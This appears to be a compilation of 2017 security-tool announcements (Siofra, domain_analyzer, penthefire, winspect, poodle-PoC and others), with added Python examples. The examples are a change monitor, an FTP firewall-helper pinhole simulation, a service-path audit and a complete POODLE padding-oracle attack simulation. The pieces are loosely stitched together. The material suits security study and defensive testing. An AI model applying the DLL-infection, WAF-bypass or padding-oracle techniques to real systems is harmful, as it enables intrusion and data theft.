Changelog WinDivert v1.3.0 24/9/2017:
– Fix BSOD that sometimes occurs after abnormal user application exit.
– Fix BSOD that sometimes occurs when WinDivert is combined with other callout drivers.
– WinDivertSend() has been optimized. However, it may not detect as many packet injection errors as it could before.

The tool is not meant to be completely accurate. There is a well-known recommendation not to rely on the output of GNU coreutils programs such as ls as input for other tools: one should rarely build tooling that parses and depends on that output, because it can change at any time. Realistically, though, the output of these tools is relatively stable, since many people and automated tools already rely on it for all kinds of purposes.


The tradeoff for dawgmon is that otherwise we would need to implement a lot of logic ourselves to do file system monitoring, and build complex binaries that link in libraries to parse and monitor block devices, network interfaces and so on. That would make the tool far more complex and less maintainable. Right now, on a project one can add a new command, including change detection, in very little time, because the main dawgmon tool already takes care of caching, executing the command, and then supplying the previous and current output to the command implementation when running a comparison. This means that on time-constrained projects one can very quickly add new commands and run analyses that include them.
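The design described above (a driver that caches output, executes each command, and hands the previous and current output to the command's own compare step) written out as an added example. This is not dawgmon's code: the class names, the `ss -ltn` parser and the sample output are assumptions constructed for the illustration, with the sample output made up so the demo runs offline.

```python
import difflib
import json
import subprocess
import tempfile
from pathlib import Path


class Command:
    """A monitored command: how to run it and how to compare old vs. new output."""
    name = "base"
    argv = []

    def execute(self) -> str:
        return subprocess.run(self.argv, capture_output=True, text=True, check=False).stdout

    def compare(self, previous: str, current: str) -> list:
        """Default comparison: report added and removed lines."""
        diff = difflib.unified_diff(previous.splitlines(), current.splitlines(), lineterm="", n=0)
        return [f"{self.name}: {line}" for line in diff
                if line.startswith(("+", "-")) and not line.startswith(("+++", "---"))]


class ListeningPorts(Command):
    """Hypothetical command: parse `ss -ltn` so only the set of listening ports is compared,
    not column widths or row order (the kind of output drift the text warns about)."""
    name = "listening_ports"
    argv = ["ss", "-ltn"]

    @staticmethod
    def ports(output: str) -> set:
        ports = set()
        for line in output.splitlines()[1:]:           # first line is the header
            fields = line.split()
            if len(fields) >= 4 and ":" in fields[3]:  # "Local Address:Port" column
                ports.add(fields[3].rsplit(":", 1)[1])
        return ports

    def compare(self, previous: str, current: str) -> list:
        old, new = self.ports(previous), self.ports(current)
        return ([f"{self.name}: new port {p}" for p in sorted(new - old)] +
                [f"{self.name}: closed port {p}" for p in sorted(old - new)])


def run_monitor(commands, cache_file: Path, execute=None) -> list:
    """Execute each command, hand cached and fresh output to compare(), update the cache.
    `execute` lets a caller substitute the real subprocess call (used by the demo)."""
    cache = json.loads(cache_file.read_text()) if cache_file.exists() else {}
    findings = []
    for cmd in commands:
        current = execute(cmd) if execute else cmd.execute()
        previous = cache.get(cmd.name)
        if previous is None:
            findings.append(f"{cmd.name}: first run, baseline stored")
        else:
            findings.extend(cmd.compare(previous, current))
        cache[cmd.name] = current
    cache_file.write_text(json.dumps(cache))
    return findings


# Constructed `ss -ltn` output (not captured from a real host) so the demo runs offline.
SS_BEFORE = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
LISTEN 0      128    127.0.0.1:631       0.0.0.0:*
"""
SS_AFTER = SS_BEFORE + "LISTEN 0      128    0.0.0.0:4444        0.0.0.0:*\n"


def demo() -> list:
    """Two runs: the first stores a baseline, the second reports the new listener."""
    with tempfile.TemporaryDirectory() as tmp:
        cache = Path(tmp) / "dawgmon-cache.json"
        cmds = [ListeningPorts()]
        run_monitor(cmds, cache, execute=lambda c: SS_BEFORE)
        return run_monitor(cmds, cache, execute=lambda c: SS_AFTER)
```

Adding a new check is a subclass with an `argv` and, optionally, a `compare()` that parses the output; the driver never changes. Parsing into a set of ports rather than diffing raw text is what keeps the check stable against the cosmetic output changes the paragraph above mentions.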

Siofra – DLL Hijacking Vulnerability Scanner and PE Infection Tool
http://seclist.us/siofra-dll-hijacking-vulnerability-scanner-and-pe-infection-tool.html
Sat, 09 Sep 2017 06:45:52 +0000

Legal Disclaimer: Do not use this on a production machine or on your daily computer/laptop. This post is for security research purposes only; you can learn how to identify and exploit DLL hijacking vulnerabilities with a single tool.

Introduction
Windows has historically had significant issues with DLL hijacking vulnerabilities, and over the years Microsoft has implemented security mechanisms in an attempt to mitigate such attacks. While analyzing an advanced persistent threat (APT) in early 2017, I was shown how surprisingly vulnerable Windows still is to such attacks, even after decades of patching specific vulnerabilities and implementing new security mechanisms. In this particular APT alone, three separate vulnerabilities in three different applications were all being leveraged for persistence.

The capabilities of the Siofra tool can be divided into two categories (intended for the two stages of carrying out this genre of attack):
1. Scanner mode, meant for identifying vulnerabilities in a desired target program (or set of programs) during the reconnaissance phase of an attack.
2. Infection mode, meant for infecting legitimate copies of the vulnerable modules identified during the reconnaissance phase of an attack for payload delivery during the exploitation phase of an attack.

domain_analyzer – security analysis of any domain by finding all the information possible
http://seclist.us/domain_analyzer-security-analysis-of-any-domain-by-finding-all-the-information-possible.html
Wed, 30 Aug 2017 08:48:27 +0000

Domain analyzer is a security analysis tool which automatically discovers and reports information about the given domain. Its main purpose is to analyze domains in an unattended way.

How it works
Domain analyzer takes a domain name and finds information about it, such as DNS servers, mail servers, IP addresses, e-mail addresses found on Google, SPF information, etc. After all the information is stored and organized, it scans the ports of every IP found using nmap and performs several other security checks. After the ports are found, it uses the tool crawler.py from @vero.valeros to spider the complete web site on every web port found. This tool has the option to download files and find open folders.

This extended edition has more features!
– World-domination: You can automatically analyze the whole world! (if you have time)
– Robin-hood: Although it is still in development, it will let you automatically send an email with the analysis information to the addresses found during the scan.
– Robtex DNS: With this function, every time you find a DNS server that allows zone transfers, it will retrieve from the robtex site the other domains using that DNS server and automatically analyze them too! This can be a never-ending test: every vulnerable DNS server can be used by hundreds of domains, which in turn can be using other vulnerable DNS servers. BEWARE! Domains retrieved this way can be unrelated to the first one.

penthefire – Security tool implementing attacks to test the resistance of a firewall
http://seclist.us/penthefire-security-tool-implementing-attacks-test-the-resistance-of-firewall.html
Sun, 20 Aug 2017 00:15:08 +0000

LEGAL DISCLAIMER: The author does not hold any responsibility for misuse of this script. Remember that attacking targets without prior consent is illegal and punishable by law. This script was built to show how resource files can automate tasks.

TODO:
+ IRC
Once a data packet is received, the attacker sends a forged DCC command.
+ FTP
The client connection is opened by the attacker: connect to the FTP server behind the firewall and initiate a real session. Once the session is set up, the attacker launches the attack by sending a forged 227 (Entering Passive Mode) reply, or a forged 229 (Entering Extended Passive Mode) reply when IPv6 is used.
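What the forged 227/229 line is aimed at is the firewall's FTP helper (ALG), which parses passive-mode replies on the control channel and opens a temporary pinhole for the data connection. The following added example (not penthefire's code; the class and the session transcript are constructed for the illustration) shows a helper that opens a pinhole for any 227/229 it sees next to one that applies the checks a careful implementation needs: only accept replies in the server-to-client direction, only for the server's own address, and only for unprivileged ports.

```python
import re

PASV_RE = re.compile(r"^227 .*?\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")
EPSV_RE = re.compile(r"^229 .*?\(\|\|\|(\d{1,5})\|\)")


def parse_passive_reply(line: str, server_ip: str):
    """Extract (ip, port) from a 227 (PASV, RFC 959) or 229 (EPSV, RFC 2428) reply.
    229 carries only a port; the host is the control connection's peer. Returns None otherwise."""
    m = PASV_RE.match(line)
    if m:
        a, b, c, d, p1, p2 = map(int, m.groups())
        if max(a, b, c, d, p1, p2) > 255:
            return None
        return f"{a}.{b}.{c}.{d}", p1 * 256 + p2
    m = EPSV_RE.match(line)
    if m:
        port = int(m.group(1))
        return (server_ip, port) if port <= 65535 else None
    return None


class FtpAlg:
    """Firewall FTP helper watching the control channel. strict=False opens a pinhole for any
    227/229 it sees (the behaviour penthefire probes); strict=True applies the checks below."""

    def __init__(self, server_ip: str, client_ip: str, strict: bool):
        self.server_ip, self.client_ip, self.strict = server_ip, client_ip, strict
        self.pinholes = []   # (client_ip, (ip, port)) temporarily allowed through

    def on_line(self, from_server: bool, line: str) -> bool:
        """Feed one control-channel line; True if a pinhole was opened."""
        if self.strict and not from_server:
            return False                   # 227/229 are server replies; ignore them from the client
        target = parse_passive_reply(line, self.server_ip)
        if target is None:
            return False
        ip, port = target
        if self.strict and (ip != self.server_ip or port < 1024):
            return False                   # reply names another host (bounce) or a privileged port
        self.pinholes.append((self.client_ip, (ip, port)))
        return True


def demo(strict: bool) -> list:
    """Constructed session: the attacker is the client, the FTP server sits behind the firewall."""
    alg = FtpAlg(server_ip="10.0.0.5", client_ip="203.0.113.7", strict=strict)
    session = [
        (True,  "220 FTP server ready"),
        (False, "USER anonymous"),
        (True,  "331 Please specify the password."),
        (False, "PASS guest@"),
        (True,  "230 Login successful."),
        # The attack: the client sends a line shaped like a server reply, naming port 22
        # on the server. A helper that parses both directions opens SSH to the attacker.
        (False, "227 Entering Passive Mode (10,0,0,5,0,22)"),
        # A genuine passive reply from the server (port 195*256+88 = 50008).
        (True,  "227 Entering Passive Mode (10,0,0,5,195,88)"),
    ]
    for from_server, line in session:
        alg.on_line(from_server, line)
    return alg.pinholes
```

Running `demo(strict=False)` returns two pinholes, including one to port 22 that the attacker, not the server, asked for; `demo(strict=True)` returns only the genuine one. Direction tracking is the check that defeats the attack as described on this page; the address and port checks additionally stop a malicious server from using the same mechanism to bounce connections to other hosts.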

WAF_Bypass_Helper – WAF bypass generator helper
http://seclist.us/waf_bypass_helper-waf-bypass-generator-helper.html
Sun, 13 Aug 2017 20:34:09 +0000

LEGAL DISCLAIMER: The author does not hold any responsibility for misuse of this script. Remember that attacking targets without prior consent is illegal and punishable by law. This script was built to show how resource files can automate tasks.

Note:
– Works with both GET and POST requests.
– Default proxy: 127.0.0.1:8080 (tested with Burp).
– If you select output to a file, two files will be created: one containing only the mutations found and one containing the order in which these mutations were created.

winspect – PowerShell based Windows Security Auditing Toolbox
http://seclist.us/winspect-powershell-based-windows-security-auditing-toolbox.html
Wed, 09 Aug 2017 15:25:47 +0000

winspect is part of a larger project for auditing different areas of Windows environments. It focuses on enumerating different parts of a Windows machine, aiming to identify security weaknesses and point to components that need further hardening. The main targets for the script are domain-joined Windows machines; however, some of the functions can also be invoked on standalone workstations.


Feature Function:
+ Gets domain users and groups with local group membership.
+ Given a specific ADSI group object, checks whether it is a local or domain group and looks for its members.
+ Checks the current configuration of User Account Control.
+ Checks the DLL search mode and inspects permissions for directories in the user and system %PATH%.
+ Gets services whose binaries are writable by the current user.
+ Looks for services with the unquoted path vulnerability.
+ Gets all services that the current user can configure.
+ Looks for autoruns specified in different places in the registry.
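Two of the checks above, unquoted service paths and writable %PATH% directories, written out as an added example. This is not winspect's code (which is PowerShell and reads the registry and ACLs directly); the function names and the sample ImagePath values are assumptions constructed so the logic can be exercised offline, and `os.access` is used as a coarse stand-in for the ACL inspection a real Windows audit needs.

```python
import os
import re
import tempfile


def unquoted_path_candidates(image_path: str) -> list:
    """For an unquoted service ImagePath whose executable path contains spaces, return the
    files Windows would try before the real binary: CreateProcess splits the command line
    at each space and appends .exe, so C:\\Program Files\\X\\svc.exe is preceded by
    C:\\Program.exe. Returns [] for quoted paths or executables without spaces."""
    image_path = image_path.strip()
    if image_path.startswith('"') or " " not in image_path:
        return []
    m = re.match(r"(.+?\.exe)(\s|$)", image_path, re.IGNORECASE)   # drop arguments after the .exe
    exe = m.group(1) if m else image_path
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def writable_dirs(dirs) -> list:
    """Directories the current user can write to. os.access is a coarse check: on Windows it
    only reflects the read-only attribute, so a real audit must read the ACL (Get-Acl)."""
    return [d for d in dirs if os.path.isdir(d) and os.access(d, os.W_OK)]


def audit(services: dict, path_entries: list) -> dict:
    """services maps service name -> ImagePath; path_entries is %PATH% split into entries.
    A writable directory that appears early in the search order, or a writable ancestor of
    an unquoted path, lets a local user plant a binary that runs with the service's account."""
    unquoted = {}
    for name, image_path in services.items():
        candidates = unquoted_path_candidates(image_path)
        if candidates:
            unquoted[name] = candidates
    return {"unquoted_service_paths": unquoted,
            "writable_path_dirs": writable_dirs(path_entries)}


SAMPLE_SERVICES = {   # constructed ImagePath values, not read from a real registry
    "GoodSvc": r'"C:\Program Files\Good Vendor\svc.exe" -run',
    "BadSvc": r"C:\Program Files\Bad Vendor\Tool Suite\svc.exe -run",
    "SysSvc": r"C:\Windows\system32\svchost.exe -k netsvcs",
}


def demo():
    """Returns (findings, tmpdir) using a temp dir as a stand-in for a writable %PATH% entry."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit(SAMPLE_SERVICES, [tmp, os.path.join(tmp, "missing")]), tmp
```

For each candidate the finding is only exploitable if the current user can create that file, which is why the two checks belong together: the unquoted path tells you where Windows will look, the permission check tells you whether an attacker can put something there.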

RPL attacks framework for simulating WSN with a malicious mote
http://seclist.us/rpl-attacks-framework-for-simulating-wsn-with-a-malicious-mote.html
Sat, 05 Aug 2017 04:28:11 +0000

RPL Attacks Framework aims to provide a simple and convenient way to generate simulations and deploy malicious motes for a Wireless Sensor Network (WSN) that uses the Routing Protocol for Low-Power and Lossy Networks (RPL) as its network layer.
With this framework, it is possible to easily define a campaign of simulations, either by redefining RPL configuration constants, by modifying single lines of the ContikiRPL library, or by using your own external RPL library. Moreover, the experiments in a campaign can be generated either on the same topology or on a randomized topology for each simulation.

poodle-PoC ~ POODLE (Padding Oracle On Downgraded Legacy Encryption) attack
http://seclist.us/poodle-poc-poodle-padding-oracle-on-downgraded-legacy-encryption-attack.html
Mon, 31 Jul 2017 17:58:00 +0000

poodle-PoC is a proof of concept that explores the cryptography behind the attack; it can be thought of as a man-in-the-middle (MiTM) attack. POODLE allows you to retrieve plaintext messages if the transport layer security in use is SSLv3 (I also made a point about TLS 1.0). It does not allow you to retrieve the key used to encrypt the messages, nor the HTTP request itself.

SSLv3 and CBC cipher mode
SSLv3 is a protocol to encrypt/decrypt and secure your data. In our case, it uses the cipher block chaining (CBC) mode. The plaintext is divided into blocks according to the encryption algorithm (AES, DES, 3DES), so the length is a multiple of 8 or 16 bytes. If the plaintext does not fill the last block, padding is added at the end to fill the missing space. In SSLv3 the receiver checks only the last padding byte (the padding length); the other padding bytes are not checked, and this is what POODLE exploits.


HMAC
SSLv3 also uses an HMAC to check the integrity and authenticity of the plaintext.
— A keyed-hash message authentication code (HMAC) is a specific type of message authentication code (MAC) involving a cryptographic hash function (hence the 'H') in combination with a secret cryptographic key.
Because of this, an attacker can't intercept and alter the ciphertext and send it back undetected. The MAC covers the plaintext but not the padding, however, so a modified record whose changed bytes all land in the padding can still be accepted.
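The two properties above (CBC with SSLv3 padding, and a MAC that does not cover the padding) are exactly what the padding oracle needs. The following added example, which is not poodle-PoC's code, simulates the attack end to end: an SSLv3-style record layer (MAC, pad, CBC-encrypt), a server that checks only the padding-length byte, and an attacker who controls the lengths of what the victim sends and replaces the padding block with the block holding the byte to recover. The block cipher is a toy Feistel permutation standing in for AES (an assumption: any invertible 16-byte permutation gives CBC the same structure), the cookie value is constructed, and the function names are this example's own.

```python
import hashlib
import hmac
import os

BLOCK = 16    # AES-sized block
MAC_LEN = 20  # SSLv3 uses a SHA-1 based MAC


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# Toy block cipher standing in for AES: a 4-round Feistel network keyed through
# SHA-256. It is NOT a secure cipher, only an invertible 16-byte permutation.
def _round_f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round_f(key, rnd, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round_f(key, rnd, left)), left
    return left + right


def client_encrypt(enc_key: bytes, mac_key: bytes, plaintext: bytes) -> bytes:
    """SSLv3 record: MAC, then pad, then CBC-encrypt. Returns IV || ciphertext."""
    data = plaintext + hmac.new(mac_key, plaintext, hashlib.sha1).digest()
    pad_len = (BLOCK - 1 - len(data) % BLOCK) % BLOCK   # padding bytes before the length byte
    data += os.urandom(pad_len) + bytes([pad_len])      # SSLv3: padding bytes are arbitrary
    iv = os.urandom(BLOCK)
    out, prev = [iv], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(enc_key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def server_accepts(enc_key: bytes, mac_key: bytes, record: bytes) -> bool:
    """The SSLv3 flaw: only the final byte (pad length) is checked, never the pad content."""
    if len(record) % BLOCK or len(record) < 2 * BLOCK:
        return False
    blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]
    data = b"".join(_xor(block_decrypt(enc_key, c), p) for p, c in zip(blocks, blocks[1:]))
    pad_len = data[-1]
    if pad_len >= BLOCK:
        return False
    data = data[:len(data) - pad_len - 1]
    if len(data) < MAC_LEN:
        return False
    plaintext, mac = data[:-MAC_LEN], data[-MAC_LEN:]
    return hmac.compare_digest(hmac.new(mac_key, plaintext, hashlib.sha1).digest(), mac)


def poodle_recover(secret_len: int, send, oracle, max_tries: int = 50000) -> bytes:
    """Recover a secret the victim embeds in every request.

    send(prefix_len, suffix_len) -> record: the victim encrypts prefix||secret||suffix;
    the attacker (via injected JavaScript in the real attack) controls only the two lengths.
    oracle(record) -> bool: whether the server accepted the (modified) record.
    """
    recovered = bytearray()
    for j in range(secret_len):
        prefix_len = (BLOCK - 1 - j) % BLOCK                         # secret[j] becomes a block's last byte
        suffix_len = (-(prefix_len + secret_len + MAC_LEN)) % BLOCK  # final block is all padding
        target = (prefix_len + j) // BLOCK + 1                       # ciphertext block holding secret[j]
        for _ in range(max_tries):
            rec = send(prefix_len, suffix_len)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]
            blocks[-1] = blocks[target]          # replace the padding block with the target block
            if oracle(b"".join(blocks)):
                # Accepted (1 in 256) => D(C_target)[-1] ^ C_{n-1}[-1] == BLOCK-1,
                # and P_target[-1] == D(C_target)[-1] ^ C_{target-1}[-1].
                recovered.append((BLOCK - 1) ^ blocks[-2][-1] ^ blocks[target - 1][-1])
                break
        else:
            raise RuntimeError("oracle never accepted; check the record layout")
    return bytes(recovered)


def demo() -> bytes:
    """Constructed scenario: a browser re-sends a cookie on every request over SSLv3."""
    enc_key, mac_key = os.urandom(16), os.urandom(16)
    secret = b"sid=ab12cd34"   # constructed sample cookie value

    def victim_send(prefix_len, suffix_len):
        return client_encrypt(enc_key, mac_key, b"/" * prefix_len + secret + b"x" * suffix_len)

    return poodle_recover(len(secret), victim_send,
                          lambda rec: server_accepts(enc_key, mac_key, rec))
```

Each byte costs about 256 requests on average because a fresh IV makes every re-encryption a new lottery ticket, and the server only leaks whether the last decrypted byte happened to equal the pad length. The MAC never fails on an accepted record because the swapped-in block is stripped entirely as padding, which is the gap between "MAC covers the plaintext" and "padding is unchecked" that the two sections above describe.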

Latest change 31/7/2017:
+ Update the old PoC with the OP_NO_COMPRESSION SSL option.
This option disables compression of the data during the client<->server exchange; otherwise the whole exchange is compressed with DEFLATE. Compression seems to mitigate the POODLE attack (more research is needed on this) because it is no longer possible to get the length of a block.

scythian – Vulnerability Assessment and Penetration Testing Toolkit
http://seclist.us/scythian-vulnerability-assessment-and-penetration-testing-toolkit.html
Sat, 08 Jul 2017 20:23:17 +0000

scythian is a set of scripts that will create a Kali-type environment for performing vulnerability assessments and penetration testing. The goal of this project was to allow a portable set of tools to be easily installed onto the Windows 10 Linux subsystem (Ubuntu/Debian).


Contents of Files
+ deps.sh – Contains the necessary software dependencies for the tools within the kit to function.
+ exploits.sh – Contains the scripts to download various exploit code from public sources.
+ services.sh – Starts the various integrated services of the kit such as msfrpcd, OpenVAS, Dradis, etc.
+ static.sh – Downloads static applications which are not available via SVN.
+ svn.sh – SVN repository scripts to check out and update the various tools.
+ wordlists.sh – Contains the scripts to download the various wordlists from public sources.
+ update.sh – The script that makes it all happen.

Pentesting-Multitool ~ Different utility scripts for pentesting and hacking
http://seclist.us/pentesting-multitool-different-utility-scripts-for-pentesting-and-hacking.html
Mon, 03 Jul 2017 23:45:23 +0000

The Pentesting-Multitool project arises from the need to gather several pentesting tools into one tool. It is developed in Python 3, using external libraries such as dnspython, pythonwhois and scapy.
The main function of the script is to collect information about DNS records, a domain, or other devices.

Before using pentesting-multitool.py please follow these steps:
1.- Install Python 3. The script has been developed using Python 3.5.2, but any Python 3.x should work correctly; if not, please report it.
2.- Install the Python module dnspython-1.15.0; you can get it from the official website or the official GitHub repository. If you can use the library with another version, please report it.
3.- Install the Python module pythonwhois-2.4.3; you can download it from the official website. If you can use the library with another version, please report it.
4.- Install the Python module shodan; you can get it from the official GitHub repository.
5.- Install the Python module scapy for Python 3; you can download it from the official website.
6.- Install TCPReplay; you can download it from the official website http://tcpreplay.appneta.com/.